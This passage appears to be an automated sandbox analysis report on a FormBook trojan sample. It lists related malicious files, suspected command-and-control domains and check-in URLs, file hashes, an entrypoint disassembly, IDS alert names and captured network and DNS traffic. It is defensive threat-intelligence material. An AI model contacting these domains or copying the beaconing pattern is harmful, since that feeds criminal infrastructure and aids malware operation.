                                                                Rq0Y7HegCd.exeGet hashmaliciousBrowse
                                                                • www.jorgeporcayo.com/dy8g/?3f=q7jKWIuNsoGkf7/hAqyN1U3v/GjJJAAs8Ri7ihl8JZVwqZwISrlxTPDImX5dFzZpf8aR&XRtpal=y48HaFr
                                                                New order 301534.pdf.exeGet hashmaliciousBrowse
                                                                • www.tuzypop.com/sbqi/?ZjR=TyogNDuayMasT0oCbdt3Eat51QL3ELvKrHkWpVATBBZEFOGxOOifBgSTpUoy0eHE1TfRcYKQLQ==&ndnddT=ot9xbpDpf8H4

                                                                Domains

                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                www.professioneconsulenza.netd6qU4nYIEp.exeGet hashmaliciousBrowse
                                                                • 89.46.109.25
                                                                Rq0Y7HegCd.exeGet hashmaliciousBrowse
                                                                • 89.46.109.25
                                                                242jQP4mQP.exeGet hashmaliciousBrowse
                                                                • 89.46.109.25
                                                                www.manageoceanaccount.comSWIFT MESSAGE DETAILS.xlsxGet hashmaliciousBrowse
                                                                • 104.21.40.211
                                                                Payment_Ref_Advice.xlsxGet hashmaliciousBrowse
                                                                • 172.67.188.96
                                                                TeMdJqNMM0.exeGet hashmaliciousBrowse
                                                                • 104.21.40.211
                                                                www.iwccgroup.com0FKzNO1g3P.exeGet hashmaliciousBrowse
                                                                • 104.21.86.209

                                                                ASN

                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                CLOUDFLARENETUSPAYMENT ADVICE.docGet hashmaliciousBrowse
                                                                • 104.21.27.166
                                                                PO20210722.xlsxGet hashmaliciousBrowse
                                                                • 162.159.130.233
                                                                New order 11244332.pdf.exeGet hashmaliciousBrowse
                                                                • 172.67.188.154
                                                                Z0hOr2pD7k.exeGet hashmaliciousBrowse
                                                                • 1.1.1.1
                                                                USD_SLIP.docxGet hashmaliciousBrowse
                                                                • 104.21.19.245
                                                                DHL JULY STATEMENT OF ACCOUNT.exeGet hashmaliciousBrowse
                                                                • 104.21.19.200
                                                                qK3005mdZn.exeGet hashmaliciousBrowse
                                                                • 172.67.168.51
                                                                whesilox.exeGet hashmaliciousBrowse
                                                                • 172.67.188.154
                                                                Bank contract,PDF.exeGet hashmaliciousBrowse
                                                                • 172.67.188.154
                                                                Scan003000494 pdf.exeGet hashmaliciousBrowse
                                                                • 172.67.188.154
                                                                Swift-pdf.exeGet hashmaliciousBrowse
                                                                • 104.21.13.164
                                                                Order _ 08201450.docGet hashmaliciousBrowse
                                                                • 172.67.188.154
                                                                aLLEK0YD2O.exeGet hashmaliciousBrowse
                                                                • 104.21.13.164
                                                                Statement SKBMT 09818.jarGet hashmaliciousBrowse
                                                                • 66.235.200.145
                                                                DOC98374933_JULY2021.EXEGet hashmaliciousBrowse
                                                                • 172.67.203.175
                                                                Specifications_Details_20337_FLQ.exeGet hashmaliciousBrowse
                                                                • 172.67.188.154
                                                                RFQ - 4 SCH 160 EQUAL TEE.docGet hashmaliciousBrowse
                                                                • 172.67.169.145
                                                                RIi1iCfuVK.exeGet hashmaliciousBrowse
                                                                • 104.21.51.99
                                                                kkXJRT8vEl.exeGet hashmaliciousBrowse
                                                                • 104.21.51.99
                                                                kS2dqbsDwD.exeGet hashmaliciousBrowse
                                                                • 104.25.234.53

                                                                JA3 Fingerprints

                                                                No context

                                                                Dropped Files

                                                                No context

                                                                Created / dropped Files

                                                                No created / dropped files found

                                                                Static File Info

                                                                General

                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Entropy (8bit):7.969197227754621
                                                                TrID:
                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                File name:85vLO1Rpcy.exe
                                                                File size:177038
                                                                MD5:91663bee11ec2466c36ff85805041fff
                                                                SHA1:944de18e73bbcf9807c960ba925641211d46cd6e
                                                                SHA256:b764504a2998416edbba85e1495c8311f8cc94f5775ce3413b8d3cbd5acf03d7
                                                                SHA512:040ca62d7816cbaeb4983defb2905ac8c6e2358b3b10b43b44948d9d521bb194253e292f525a06109490a2d22ca6db2b20654d17cfadaa16ba1c3ae15d0a1a92
                                                                SSDEEP:3072:Se8sLVMMnySqjooMKC8r8onTKtd5xYMhVwHlKKUQKZ/1CUmXAgrhIWS2OWYilqje:SEL6MyS8oB3KnIdD18gKUQKTCUpgrhIq
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........=Wu.\9&.\9&.\9&.$.&.\9&.\8&.\9&.$.&.\9&.$.&.\9&Rich.\9&........................PE..L....;.`...................................

                                                                File Icon

                                                                Icon Hash:00828e8e8686b000

                                                                Static PE Info

                                                                General

                                                                Entrypoint:0x401000
                                                                Entrypoint Section:.text
                                                                Digitally signed:false
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                                                                DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE
                                                                Time Stamp:0x60F93B1D [Thu Jul 22 09:32:13 2021 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:5
                                                                OS Version Minor:0
                                                                File Version Major:5
                                                                File Version Minor:0
                                                                Subsystem Version Major:5
                                                                Subsystem Version Minor:0
                                                                Import Hash:63b0867460dd31e465a337a5e3e003e6

                                                                Entrypoint Preview

                                                                Instruction
                                                                push ebp
                                                                mov ebp, esp
                                                                sub esp, 00000670h
                                                                mov byte ptr [ebp-00000288h], FFFFFFE9h
                                                                mov byte ptr [ebp-00000287h], FFFFFF90h
                                                                mov byte ptr [ebp-00000286h], 00000000h
                                                                mov byte ptr [ebp-00000285h], 00000000h
                                                                mov byte ptr [ebp-00000284h], 00000000h
                                                                mov byte ptr [ebp-00000283h], 00000055h
                                                                mov byte ptr [ebp-00000282h], FFFFFF8Bh
                                                                mov byte ptr [ebp-00000281h], FFFFFFECh
                                                                mov byte ptr [ebp-00000280h], 00000056h
                                                                mov byte ptr [ebp-0000027Fh], FFFFFF8Bh
                                                                mov byte ptr [ebp-0000027Eh], 00000075h
                                                                mov byte ptr [ebp-0000027Dh], 00000008h
                                                                mov byte ptr [ebp-0000027Ch], FFFFFFBAh
                                                                mov byte ptr [ebp-0000027Bh], FFFFFFEFh
                                                                mov byte ptr [ebp-0000027Ah], 00000012h
                                                                mov byte ptr [ebp-00000279h], 00000000h
                                                                mov byte ptr [ebp-00000278h], 00000000h
                                                                mov byte ptr [ebp-00000277h], 00000057h
                                                                mov byte ptr [ebp-00000276h], FFFFFFEBh
                                                                mov byte ptr [ebp-00000275h], 0000000Eh
                                                                mov byte ptr [ebp-00000274h], FFFFFF8Bh
                                                                mov byte ptr [ebp-00000273h], FFFFFFCAh
                                                                mov byte ptr [ebp-00000272h], FFFFFFD1h
                                                                mov byte ptr [ebp-00000271h], FFFFFFE8h
                                                                mov byte ptr [ebp-00000270h], FFFFFFC1h
                                                                mov byte ptr [ebp-0000026Fh], FFFFFFE1h
                                                                mov byte ptr [ebp-0000026Eh], 00000007h
                                                                mov byte ptr [ebp+00000000h], 00000000h

                                                                Rich Headers

                                                                Programming Language:
                                                                • [ C ] VS2008 SP1 build 30729
                                                                • [IMP] VS2008 SP1 build 30729
                                                                • [LNK] VS2008 SP1 build 30729

                                                                Data Directories

                                                                NameVirtual AddressVirtual Size Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x30700x78.rdata
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IAT0x30000x70.rdata
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                Sections

                                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                .text0x10000x10e80x1200False0.476996527778data4.706153126IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                .rdata0x30000x2340x400False0.3125data2.64202346139IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                Imports

                                                                DLLImport
                                                                USER32.dllGetDC, GrayStringA
                                                                OLEAUT32.dllVarCyFromI4, VARIANT_UserSize, DispGetIDsOfNames, VariantChangeTypeEx, VarI4FromI1, SafeArrayGetElement, VarDecFromUI1, VarR8FromI4, VarDiv
                                                                WINSPOOL.DRVConnectToPrinterDlg, AddPortW, DeleteFormW, EnumPrintProcessorDatatypesA
                                                                dbghelp.dllMakeSureDirectoryPathExists, SymGetLineFromAddr64
                                                                WS2_32.dllWSAAsyncGetProtoByNumber, htons, WSACleanup, getprotobynumber, ntohs

                                                                Network Behavior

                                                                Snort IDS Alerts

                                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                07/22/21-17:58:53.783078TCP1201ATTACK-RESPONSES 403 Forbidden804976034.102.136.180192.168.2.4
                                                                07/22/21-17:59:47.938975TCP2031453ET TROJAN FormBook CnC Checkin (GET)4976980192.168.2.4172.67.129.33
                                                                07/22/21-17:59:47.938975TCP2031449ET TROJAN FormBook CnC Checkin (GET)4976980192.168.2.4172.67.129.33
                                                                07/22/21-17:59:47.938975TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976980192.168.2.4172.67.129.33
                                                                07/22/21-17:59:53.264167TCP1201ATTACK-RESPONSES 403 Forbidden804977034.102.136.180192.168.2.4

                                                                Network Port Distribution

                                                                TCP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Jul 22, 2021 17:58:53.597157001 CEST4976080192.168.2.434.102.136.180
                                                                Jul 22, 2021 17:58:53.640444040 CEST804976034.102.136.180192.168.2.4
                                                                Jul 22, 2021 17:58:53.643758059 CEST4976080192.168.2.434.102.136.180
                                                                Jul 22, 2021 17:58:53.644109964 CEST4976080192.168.2.434.102.136.180
                                                                Jul 22, 2021 17:58:53.687212944 CEST804976034.102.136.180192.168.2.4
                                                                Jul 22, 2021 17:58:53.783077955 CEST804976034.102.136.180192.168.2.4
                                                                Jul 22, 2021 17:58:53.783103943 CEST804976034.102.136.180192.168.2.4
                                                                Jul 22, 2021 17:58:53.783427000 CEST4976080192.168.2.434.102.136.180
                                                                Jul 22, 2021 17:58:53.783457994 CEST4976080192.168.2.434.102.136.180
                                                                Jul 22, 2021 17:58:54.278949022 CEST4976080192.168.2.434.102.136.180
                                                                Jul 22, 2021 17:58:54.322173119 CEST804976034.102.136.180192.168.2.4
                                                                Jul 22, 2021 17:58:58.867496967 CEST4976180192.168.2.464.227.87.162
                                                                Jul 22, 2021 17:58:59.059680939 CEST804976164.227.87.162192.168.2.4
                                                                Jul 22, 2021 17:58:59.060267925 CEST4976180192.168.2.464.227.87.162
                                                                Jul 22, 2021 17:58:59.060558081 CEST4976180192.168.2.464.227.87.162
                                                                Jul 22, 2021 17:58:59.252859116 CEST804976164.227.87.162192.168.2.4
                                                                Jul 22, 2021 17:58:59.252990961 CEST804976164.227.87.162192.168.2.4
                                                                Jul 22, 2021 17:58:59.253041983 CEST804976164.227.87.162192.168.2.4
                                                                Jul 22, 2021 17:58:59.253340006 CEST4976180192.168.2.464.227.87.162
                                                                Jul 22, 2021 17:58:59.253437996 CEST4976180192.168.2.464.227.87.162
                                                                Jul 22, 2021 17:58:59.447355032 CEST804976164.227.87.162192.168.2.4
                                                                Jul 22, 2021 17:59:04.433288097 CEST4976280192.168.2.478.47.57.7
                                                                Jul 22, 2021 17:59:04.503684998 CEST804976278.47.57.7192.168.2.4
                                                                Jul 22, 2021 17:59:04.503810883 CEST4976280192.168.2.478.47.57.7
                                                                Jul 22, 2021 17:59:04.504060984 CEST4976280192.168.2.478.47.57.7
                                                                Jul 22, 2021 17:59:04.574091911 CEST804976278.47.57.7192.168.2.4
                                                                Jul 22, 2021 17:59:04.887867928 CEST804976278.47.57.7192.168.2.4
                                                                Jul 22, 2021 17:59:04.888128042 CEST804976278.47.57.7192.168.2.4
                                                                Jul 22, 2021 17:59:04.888236046 CEST4976280192.168.2.478.47.57.7
                                                                Jul 22, 2021 17:59:04.888264894 CEST4976280192.168.2.478.47.57.7
                                                                Jul 22, 2021 17:59:04.958375931 CEST804976278.47.57.7192.168.2.4
                                                                Jul 22, 2021 17:59:10.000493050 CEST4976380192.168.2.489.46.109.25
                                                                Jul 22, 2021 17:59:10.061440945 CEST804976389.46.109.25192.168.2.4
                                                                Jul 22, 2021 17:59:10.061651945 CEST4976380192.168.2.489.46.109.25
                                                                Jul 22, 2021 17:59:10.061862946 CEST4976380192.168.2.489.46.109.25
                                                                Jul 22, 2021 17:59:10.122525930 CEST804976389.46.109.25192.168.2.4
                                                                Jul 22, 2021 17:59:10.122562885 CEST804976389.46.109.25192.168.2.4
                                                                Jul 22, 2021 17:59:10.122580051 CEST804976389.46.109.25192.168.2.4
                                                                Jul 22, 2021 17:59:10.122884989 CEST4976380192.168.2.489.46.109.25
                                                                Jul 22, 2021 17:59:10.122971058 CEST4976380192.168.2.489.46.109.25
                                                                Jul 22, 2021 17:59:10.421156883 CEST4976380192.168.2.489.46.109.25
                                                                Jul 22, 2021 17:59:11.030420065 CEST4976380192.168.2.489.46.109.25
                                                                Jul 22, 2021 17:59:12.233558893 CEST4976380192.168.2.489.46.109.25
                                                                Jul 22, 2021 17:59:14.640782118 CEST4976380192.168.2.489.46.109.25
                                                                Jul 22, 2021 17:59:15.195692062 CEST4976480192.168.2.4104.21.86.209
                                                                Jul 22, 2021 17:59:15.237159014 CEST8049764104.21.86.209192.168.2.4
                                                                Jul 22, 2021 17:59:15.237281084 CEST4976480192.168.2.4104.21.86.209
                                                                Jul 22, 2021 17:59:15.237628937 CEST4976480192.168.2.4104.21.86.209
                                                                Jul 22, 2021 17:59:15.278980017 CEST8049764104.21.86.209192.168.2.4
                                                                Jul 22, 2021 17:59:15.681235075 CEST8049764104.21.86.209192.168.2.4
                                                                Jul 22, 2021 17:59:15.681271076 CEST8049764104.21.86.209192.168.2.4
                                                                Jul 22, 2021 17:59:15.681294918 CEST8049764104.21.86.209192.168.2.4
                                                                Jul 22, 2021 17:59:15.681312084 CEST8049764104.21.86.209192.168.2.4
                                                                Jul 22, 2021 17:59:15.681531906 CEST4976480192.168.2.4104.21.86.209
                                                                Jul 22, 2021 17:59:15.681598902 CEST4976480192.168.2.4104.21.86.209
                                                                Jul 22, 2021 17:59:15.681621075 CEST8049764104.21.86.209192.168.2.4
                                                                Jul 22, 2021 17:59:15.681715965 CEST4976480192.168.2.4104.21.86.209
                                                                Jul 22, 2021 17:59:19.453015089 CEST4976380192.168.2.489.46.109.25
                                                                Jul 22, 2021 17:59:26.209660053 CEST4976680192.168.2.4104.21.40.211
                                                                Jul 22, 2021 17:59:26.251007080 CEST8049766104.21.40.211192.168.2.4
                                                                Jul 22, 2021 17:59:26.254384041 CEST4976680192.168.2.4104.21.40.211
                                                                Jul 22, 2021 17:59:26.254539013 CEST4976680192.168.2.4104.21.40.211
                                                                Jul 22, 2021 17:59:26.295691013 CEST8049766104.21.40.211192.168.2.4
                                                                Jul 22, 2021 17:59:26.328947067 CEST8049766104.21.40.211192.168.2.4
                                                                Jul 22, 2021 17:59:26.328969002 CEST8049766104.21.40.211192.168.2.4
                                                                Jul 22, 2021 17:59:26.329005957 CEST8049766104.21.40.211192.168.2.4
                                                                Jul 22, 2021 17:59:26.329252005 CEST4976680192.168.2.4104.21.40.211
                                                                Jul 22, 2021 17:59:26.329374075 CEST4976680192.168.2.4104.21.40.211
                                                                Jul 22, 2021 17:59:29.063158035 CEST4976380192.168.2.489.46.109.25
                                                                Jul 22, 2021 17:59:42.142477989 CEST4976880192.168.2.4162.241.62.54
                                                                Jul 22, 2021 17:59:42.308490038 CEST8049768162.241.62.54192.168.2.4
                                                                Jul 22, 2021 17:59:42.309855938 CEST4976880192.168.2.4162.241.62.54
                                                                Jul 22, 2021 17:59:42.309887886 CEST4976880192.168.2.4162.241.62.54
                                                                Jul 22, 2021 17:59:42.475857019 CEST8049768162.241.62.54192.168.2.4
                                                                Jul 22, 2021 17:59:42.799355030 CEST4976880192.168.2.4162.241.62.54
                                                                Jul 22, 2021 17:59:43.005626917 CEST8049768162.241.62.54192.168.2.4
                                                                Jul 22, 2021 17:59:43.077874899 CEST8049768162.241.62.54192.168.2.4
                                                                Jul 22, 2021 17:59:43.077910900 CEST8049768162.241.62.54192.168.2.4
                                                                Jul 22, 2021 17:59:43.077923059 CEST8049768162.241.62.54192.168.2.4
                                                                Jul 22, 2021 17:59:43.078068972 CEST4976880192.168.2.4162.241.62.54
                                                                Jul 22, 2021 17:59:43.078102112 CEST4976880192.168.2.4162.241.62.54
                                                                Jul 22, 2021 17:59:43.078602076 CEST4976880192.168.2.4162.241.62.54
                                                                Jul 22, 2021 17:59:43.079334974 CEST8049768162.241.62.54192.168.2.4
                                                                Jul 22, 2021 17:59:43.079477072 CEST4976880192.168.2.4162.241.62.54
                                                                Jul 22, 2021 17:59:43.079710007 CEST8049768162.241.62.54192.168.2.4
                                                                Jul 22, 2021 17:59:43.079770088 CEST4976880192.168.2.4162.241.62.54
                                                                Jul 22, 2021 17:59:47.896868944 CEST4976980192.168.2.4172.67.129.33
                                                                Jul 22, 2021 17:59:47.938344955 CEST8049769172.67.129.33192.168.2.4
                                                                Jul 22, 2021 17:59:47.938543081 CEST4976980192.168.2.4172.67.129.33
                                                                Jul 22, 2021 17:59:47.938975096 CEST4976980192.168.2.4172.67.129.33
                                                                Jul 22, 2021 17:59:47.980230093 CEST8049769172.67.129.33192.168.2.4
                                                                Jul 22, 2021 17:59:48.012661934 CEST8049769172.67.129.33192.168.2.4
                                                                Jul 22, 2021 17:59:48.012758970 CEST8049769172.67.129.33192.168.2.4
                                                                Jul 22, 2021 17:59:48.013010979 CEST4976980192.168.2.4172.67.129.33
                                                                Jul 22, 2021 17:59:48.013118982 CEST4976980192.168.2.4172.67.129.33
                                                                Jul 22, 2021 17:59:48.054305077 CEST8049769172.67.129.33192.168.2.4
                                                                Jul 22, 2021 17:59:53.083327055 CEST4977080192.168.2.434.102.136.180
                                                                Jul 22, 2021 17:59:53.125459909 CEST804977034.102.136.180192.168.2.4
                                                                Jul 22, 2021 17:59:53.125825882 CEST4977080192.168.2.434.102.136.180
                                                                Jul 22, 2021 17:59:53.125844002 CEST4977080192.168.2.434.102.136.180

                                                                UDP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Jul 22, 2021 17:57:36.313282967 CEST6529853192.168.2.48.8.8.8
                                                                Jul 22, 2021 17:57:36.315349102 CEST5912353192.168.2.48.8.8.8
                                                                Jul 22, 2021 17:57:36.370449066 CEST53652988.8.8.8192.168.2.4
                                                                Jul 22, 2021 17:57:36.376116037 CEST53591238.8.8.8192.168.2.4
                                                                Jul 22, 2021 17:57:37.161740065 CEST5453153192.168.2.48.8.8.8
                                                                Jul 22, 2021 17:57:37.223788977 CEST53545318.8.8.8192.168.2.4
                                                                Jul 22, 2021 17:57:40.991270065 CEST4971453192.168.2.48.8.8.8
                                                                Jul 22, 2021 17:57:41.046431065 CEST53497148.8.8.8192.168.2.4
                                                                Jul 22, 2021 17:57:42.190628052 CEST5802853192.168.2.48.8.8.8
                                                                Jul 22, 2021 17:57:42.242769003 CEST53580288.8.8.8192.168.2.4
                                                                Jul 22, 2021 17:57:43.205693007 CEST5309753192.168.2.48.8.8.8
                                                                Jul 22, 2021 17:57:43.254811049 CEST53530978.8.8.8192.168.2.4
                                                                Jul 22, 2021 17:57:44.032094955 CEST4925753192.168.2.48.8.8.8
                                                                Jul 22, 2021 17:57:44.097603083 CEST53492578.8.8.8192.168.2.4
                                                                Jul 22, 2021 17:57:44.927361012 CEST6238953192.168.2.48.8.8.8
                                                                Jul 22, 2021 17:57:44.984817982 CEST53623898.8.8.8192.168.2.4
                                                                Jul 22, 2021 17:57:45.935471058 CEST4991053192.168.2.48.8.8.8
                                                                Jul 22, 2021 17:57:45.990206003 CEST53499108.8.8.8192.168.2.4
                                                                Jul 22, 2021 17:57:47.089982986 CEST5585453192.168.2.48.8.8.8
                                                                Jul 22, 2021 17:57:47.146457911 CEST53558548.8.8.8192.168.2.4
                                                                Jul 22, 2021 17:57:47.935260057 CEST6454953192.168.2.48.8.8.8
                                                                Jul 22, 2021 17:57:47.988466024 CEST53645498.8.8.8192.168.2.4
                                                                Jul 22, 2021 17:57:54.258121014 CEST6315353192.168.2.48.8.8.8
                                                                Jul 22, 2021 17:57:54.310722113 CEST53631538.8.8.8192.168.2.4
                                                                Jul 22, 2021 17:57:55.075237036 CEST5299153192.168.2.48.8.8.8
                                                                Jul 22, 2021 17:57:55.127279997 CEST53529918.8.8.8192.168.2.4
                                                                Jul 22, 2021 17:57:56.146461964 CEST5370053192.168.2.48.8.8.8
                                                                Jul 22, 2021 17:57:56.203408957 CEST53537008.8.8.8192.168.2.4
                                                                Jul 22, 2021 17:57:57.177795887 CEST5172653192.168.2.48.8.8.8
                                                                Jul 22, 2021 17:57:57.229603052 CEST53517268.8.8.8192.168.2.4
                                                                Jul 22, 2021 17:57:58.215534925 CEST5679453192.168.2.48.8.8.8
                                                                Jul 22, 2021 17:57:58.272744894 CEST53567948.8.8.8192.168.2.4
                                                                Jul 22, 2021 17:58:00.120146990 CEST5653453192.168.2.48.8.8.8
                                                                Jul 22, 2021 17:58:00.180008888 CEST53565348.8.8.8192.168.2.4
                                                                Jul 22, 2021 17:58:02.403296947 CEST5662753192.168.2.48.8.8.8
                                                                Jul 22, 2021 17:58:02.455421925 CEST53566278.8.8.8192.168.2.4
                                                                Jul 22, 2021 17:58:03.777609110 CEST5662153192.168.2.48.8.8.8
                                                                Jul 22, 2021 17:58:03.827518940 CEST53566218.8.8.8192.168.2.4
                                                                Jul 22, 2021 17:58:04.793417931 CEST6311653192.168.2.48.8.8.8
                                                                Jul 22, 2021 17:58:04.864845037 CEST53631168.8.8.8192.168.2.4
                                                                Jul 22, 2021 17:58:04.971244097 CEST6407853192.168.2.48.8.8.8
                                                                Jul 22, 2021 17:58:05.020303965 CEST53640788.8.8.8192.168.2.4
                                                                Jul 22, 2021 17:58:06.124804020 CEST6480153192.168.2.48.8.8.8
                                                                Jul 22, 2021 17:58:06.184788942 CEST53648018.8.8.8192.168.2.4
                                                                Jul 22, 2021 17:58:27.728662014 CEST6172153192.168.2.48.8.8.8
                                                                Jul 22, 2021 17:58:27.825376987 CEST53617218.8.8.8192.168.2.4
                                                                Jul 22, 2021 17:58:28.940677881 CEST5125553192.168.2.48.8.8.8
                                                                Jul 22, 2021 17:58:29.000389099 CEST53512558.8.8.8192.168.2.4
                                                                Jul 22, 2021 17:58:30.017081976 CEST6152253192.168.2.48.8.8.8
                                                                Jul 22, 2021 17:58:30.073992968 CEST53615228.8.8.8192.168.2.4
                                                                Jul 22, 2021 17:58:30.153373003 CEST5233753192.168.2.48.8.8.8
                                                                Jul 22, 2021 17:58:30.215703964 CEST53523378.8.8.8192.168.2.4
                                                                Jul 22, 2021 17:58:30.556526899 CEST5504653192.168.2.48.8.8.8
                                                                Jul 22, 2021 17:58:30.622924089 CEST53550468.8.8.8192.168.2.4
                                                                Jul 22, 2021 17:58:30.852163076 CEST4961253192.168.2.48.8.8.8
                                                                Jul 22, 2021 17:58:30.933320045 CEST53496128.8.8.8192.168.2.4
                                                                Jul 22, 2021 17:58:32.018532038 CEST4928553192.168.2.48.8.8.8
                                                                Jul 22, 2021 17:58:32.078849077 CEST53492858.8.8.8192.168.2.4
                                                                Jul 22, 2021 17:58:33.087373018 CEST5060153192.168.2.48.8.8.8
                                                                Jul 22, 2021 17:58:33.149784088 CEST53506018.8.8.8192.168.2.4
                                                                Jul 22, 2021 17:58:35.333154917 CEST6087553192.168.2.48.8.8.8
                                                                Jul 22, 2021 17:58:35.393279076 CEST53608758.8.8.8192.168.2.4
                                                                Jul 22, 2021 17:58:36.999396086 CEST5644853192.168.2.48.8.8.8
                                                                Jul 22, 2021 17:58:37.060000896 CEST53564488.8.8.8192.168.2.4
                                                                Jul 22, 2021 17:58:38.619467020 CEST5917253192.168.2.48.8.8.8
                                                                Jul 22, 2021 17:58:38.676644087 CEST53591728.8.8.8192.168.2.4
                                                                Jul 22, 2021 17:58:39.654539108 CEST6242053192.168.2.48.8.8.8
                                                                Jul 22, 2021 17:58:39.714941025 CEST53624208.8.8.8192.168.2.4
                                                                Jul 22, 2021 17:58:49.895446062 CEST6057953192.168.2.48.8.8.8
                                                                Jul 22, 2021 17:58:49.956135035 CEST53605798.8.8.8192.168.2.4
                                                                Jul 22, 2021 17:58:53.528120041 CEST5018353192.168.2.48.8.8.8
                                                                Jul 22, 2021 17:58:53.591170073 CEST53501838.8.8.8192.168.2.4
                                                                Jul 22, 2021 17:58:58.804101944 CEST6153153192.168.2.48.8.8.8
                                                                Jul 22, 2021 17:58:58.863302946 CEST53615318.8.8.8192.168.2.4
                                                                Jul 22, 2021 17:59:04.268095970 CEST4922853192.168.2.48.8.8.8
                                                                Jul 22, 2021 17:59:04.431778908 CEST53492288.8.8.8192.168.2.4
                                                                Jul 22, 2021 17:59:09.924380064 CEST5979453192.168.2.48.8.8.8
                                                                Jul 22, 2021 17:59:09.999142885 CEST53597948.8.8.8192.168.2.4
                                                                Jul 22, 2021 17:59:15.129786968 CEST5591653192.168.2.48.8.8.8
                                                                Jul 22, 2021 17:59:15.193748951 CEST53559168.8.8.8192.168.2.4
                                                                Jul 22, 2021 17:59:20.707901001 CEST5275253192.168.2.48.8.8.8
                                                                Jul 22, 2021 17:59:21.100776911 CEST53527528.8.8.8192.168.2.4
                                                                Jul 22, 2021 17:59:24.303745031 CEST6054253192.168.2.48.8.8.8
                                                                Jul 22, 2021 17:59:24.368860006 CEST53605428.8.8.8192.168.2.4
                                                                Jul 22, 2021 17:59:26.142884016 CEST6068953192.168.2.48.8.8.8
                                                                Jul 22, 2021 17:59:26.208291054 CEST53606898.8.8.8192.168.2.4
                                                                Jul 22, 2021 17:59:26.827694893 CEST6420653192.168.2.48.8.8.8
                                                                Jul 22, 2021 17:59:26.892404079 CEST53642068.8.8.8192.168.2.4
                                                                Jul 22, 2021 17:59:31.349689960 CEST5090453192.168.2.48.8.8.8
                                                                Jul 22, 2021 17:59:31.431299925 CEST53509048.8.8.8192.168.2.4
                                                                Jul 22, 2021 17:59:36.442914963 CEST5752553192.168.2.48.8.8.8
                                                                Jul 22, 2021 17:59:36.513633013 CEST53575258.8.8.8192.168.2.4
                                                                Jul 22, 2021 17:59:41.937380075 CEST5381453192.168.2.48.8.8.8
                                                                Jul 22, 2021 17:59:42.140947104 CEST53538148.8.8.8192.168.2.4
                                                                Jul 22, 2021 17:59:47.820266962 CEST5341853192.168.2.48.8.8.8
                                                                Jul 22, 2021 17:59:47.895555019 CEST53534188.8.8.8192.168.2.4
                                                                Jul 22, 2021 17:59:53.020230055 CEST6283353192.168.2.48.8.8.8
                                                                Jul 22, 2021 17:59:53.082292080 CEST53628338.8.8.8192.168.2.4

                                                                DNS Queries

                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                Jul 22, 2021 17:58:53.528120041 CEST192.168.2.48.8.8.80xa643Standard query (0)www.fitnesstwentytwenty.comA (IP address)IN (0x0001)
                                                                Jul 22, 2021 17:58:58.804101944 CEST192.168.2.48.8.8.80x288fStandard query (0)www.melodezu.comA (IP address)IN (0x0001)
                                                                Jul 22, 2021 17:59:04.268095970 CEST192.168.2.48.8.8.80xbfe0Standard query (0)www.sprinkleresources.comA (IP address)IN (0x0001)
                                                                Jul 22, 2021 17:59:09.924380064 CEST192.168.2.48.8.8.80x7f21Standard query (0)www.professioneconsulenza.netA (IP address)IN (0x0001)
                                                                Jul 22, 2021 17:59:15.129786968 CEST192.168.2.48.8.8.80x14a9Standard query (0)www.iwccgroup.comA (IP address)IN (0x0001)
                                                                Jul 22, 2021 17:59:20.707901001 CEST192.168.2.48.8.8.80x4733Standard query (0)www.saludflv.infoA (IP address)IN (0x0001)
                                                                Jul 22, 2021 17:59:26.142884016 CEST192.168.2.48.8.8.80x8bdfStandard query (0)www.manageoceanaccount.comA (IP address)IN (0x0001)
                                                                Jul 22, 2021 17:59:31.349689960 CEST192.168.2.48.8.8.80xf3f8Standard query (0)www.cwdelrio.comA (IP address)IN (0x0001)
                                                                Jul 22, 2021 17:59:36.442914963 CEST192.168.2.48.8.8.80x1bf3Standard query (0)www.mydreamtv.netA (IP address)IN (0x0001)
                                                                Jul 22, 2021 17:59:41.937380075 CEST192.168.2.48.8.8.80x7e22Standard query (0)www.jorgeporcayo.comA (IP address)IN (0x0001)
